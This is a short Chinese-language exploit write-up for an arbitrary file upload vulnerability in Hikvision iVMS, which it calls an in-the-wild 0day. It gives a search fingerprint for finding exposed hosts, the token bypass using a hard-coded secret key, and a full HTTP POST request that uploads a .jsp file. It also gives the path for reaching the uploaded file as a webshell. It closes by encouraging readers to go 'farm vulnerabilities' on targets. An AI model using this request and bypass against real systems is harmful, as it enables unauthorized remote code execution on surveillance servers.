漏洞概述
简介:海康威视iVMS系统存在在野 0day 漏洞,攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。
hunter指纹
web.icon==“3670cbb1369332b296ce44a94b7dd685”
漏洞复现
漏洞url:/eps/api/resourceOperations/upload
检测脚本PoC:/sccmdaveli/hikvision-poc
可以看到需要token,这俩token需要用url+secretkey的md5值进行绕过
http://url/eps/api/resourceOperations/uploadsecretKeyIbuilding
进行上传
POST /eps/api/resourceOperations/upload?token=Token值HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept:/
Connection: close
Cookie: ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169
Content-Length: 179
Content-Type: multipart/form-data; boundary=f7d1250b2d43db9324c19e1073573ce6
–f7d1250b2d43db9324c19e1073573ce6
Content-Disposition: form-data; name=“fileUploader”; filename=“1.jsp”
Content-Type: image/jpeg
test
–f7d1250b2d43db9324c19e1073573ce6–
访问路径http://url/eps/upload/uid.jsp
然后就可以愉快的刷洞了
更为详细链接为:/qq_41904294/article/details/130807691
